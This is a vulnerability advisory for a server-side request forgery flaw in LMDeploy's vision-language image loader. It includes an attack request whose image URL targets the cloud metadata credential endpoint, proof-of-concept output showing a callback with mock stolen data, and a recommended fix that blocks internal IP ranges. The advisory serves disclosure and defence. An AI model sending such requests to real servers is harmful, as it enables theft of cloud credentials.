PT-2026-59261 · Pypi · Lmdeploy

Published

2026-07-13

·

Updated

2026-07-13

CVSS v3.1

7.5

High

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The load image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.

Affected Versions

  • Tested on: main branch (2026-02-04)
  • Affected: All versions prior to 0.12.3

Vulnerable Code

File: lmdeploy/vl/utils.py (lines 64-67)
python
def load image(image url: Union[str, Image.Image]) -> Image.Image:
  # ...
  if image url.startswith('http'):
    response = requests.get(image url, headers=headers, timeout=FETCH TIMEOUT)
    # NO VALIDATION OF URL/IP BEFORE REQUEST
Also affected: encode image base64() function (lines 26-29)

Root Cause

  1. No validation of URLs before fetching
  2. No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
  3. Server binds to 0.0.0.0 by default (api server.py line 1393)
  4. API keys disabled by default

Attack Scenario

  1. LMDeploy server deployed with vision-language model
  2. Attacker sends request to /v1/chat/completions with malicious image url:
python
POST /v1/chat/completions
{
 "model": "internlm-xcomposer2",
 "messages": [{
  "role": "user", 
  "content": [
   {"type": "text", "text": "Describe this image"},
   {"type": "image url", "image url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
  ]
 }]
}
  1. Server fetches URL without validation
  2. Attacker receives cloud credentials

Proof of Concept

Verified Exploitation Result

╔═══════════════════════════════════════════════════════════════════════╗
║ LMDeploy SSRF Vulnerability - Proof of Concept            ║
╚═══════════════════════════════════════════════════════════════════════╝

[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF PROOF?stolen data=AWS SECRET KEY
[3] Calling vulnerable load image() function...

======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
  Time:    2026-02-04 16:10:57
  Path:    /SSRF PROOF?stolen data=AWS SECRET KEY
  Client:   127.0.0.1:51154
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================

✅ SSRF VULNERABILITY CONFIRMED!

Impact

  • Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
  • Internal Service Access: Reach services not exposed to internet
  • Information Disclosure: Port scan internal networks
  • Lateral Movement: Pivot point for further attacks

Recommended Fix

python
from urllib.parse import urlparse
import ipaddress
import socket

BLOCKED NETWORKS = [
  ipaddress.ip network('127.0.0.0/8'),
  ipaddress.ip network('10.0.0.0/8'),
  ipaddress.ip network('172.16.0.0/12'),
  ipaddress.ip network('192.168.0.0/16'),
  ipaddress.ip network('169.254.0.0/16'),
]

def is safe url(url: str) -> bool:
  try:
    parsed = urlparse(url)
    if parsed.scheme not in ('http', 'https'):
      return False
    ip = socket.gethostbyname(parsed.hostname)
    ip addr = ipaddress.ip address(ip)
    return not any(ip addr in network for network in BLOCKED NETWORKS)
  except:
    return False

Credit

This vulnerability was discovered as part of Orca Security's research.
Researcher: Igor Stepansky Organization: Orca Security Emails: igor.stepansky@orca.security iggy.p0pi@orca.security

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-2607

Affected Products

Lmdeploy